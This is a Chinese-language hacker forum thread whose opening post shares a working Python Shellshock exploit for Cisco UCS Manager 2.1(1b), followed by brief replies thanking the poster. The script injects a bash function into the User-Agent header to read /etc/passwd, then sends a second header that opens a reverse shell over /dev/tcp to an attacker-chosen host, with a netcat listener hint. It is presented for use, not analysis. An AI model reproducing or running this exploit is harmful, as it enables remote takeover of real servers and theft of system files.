查看: 55711|回复: 2307

思科UCS管理器2.1(1b) - Shellshock Exploit

[复制链接]
  • TA的每日心情

    昨天 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-3-17 13:24:21 | 显示全部楼层 |阅读模式
    新鲜的出炉的

    [Python] 纯文本查看 复制代码
    #!/usr/bin/python
      
    import sys
    import requests
    import time
       
    if len(sys.argv) < 4:
        print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
        print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
        print "[*]"
        print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
        print "[*] Listener: nc -lvp <port>"
        print "\n"
        sys.exit()
      
    #Disables request warning for cert validation ignore.
    requests.packages.urllib3.disable_warnings() 
    ucs = sys.argv[1]
    url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
    attackhost = sys.argv[2]
    revshellport = sys.argv[3]
    headers1 = {
            'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
            }
    headers2 = {
            "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
            }
      
    def exploit():
        try:
            r = requests.get(url, headers=headers1, verify=False, timeout=5)
        except Exception, e:
            if 'timeout' in str(e):
                print "[+] Success.  Enjoy your shell..."
            else:
                print "[-] Something is wrong..."
                print "[-] Error: " + str(e)
      
    def main():
        try:
            r = requests.get(url, headers=headers2, verify=False, timeout=3)
            if r.content.startswith('\nroot:'):
                print "[+] Host is vulnerable, spawning shell..."
                time.sleep(3)
                exploit()
            else:
                print "[-] Host is not vulnerable, quitting..."
                sys.exit()
        except Exception, e:
            print "[-] Something is wrong..."
            print "[-] Error: " + str(e)
      
    if __name__ == "__main__":
        main()
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2021-1-25 21:16
  • 签到天数: 419 天

    [LV.9]以坛为家II

    发表于 2016-3-17 20:08:20 | 显示全部楼层
    谢谢楼主分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-18 01:14:30 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2016-3-18 01:53:55 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-18 03:00:53 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-18 16:02:51 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-3-18 19:33:57 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-19 00:30:58 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-19 04:10:30 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-19 13:01:14 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-14 14:55 , Processed in 0.030925 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部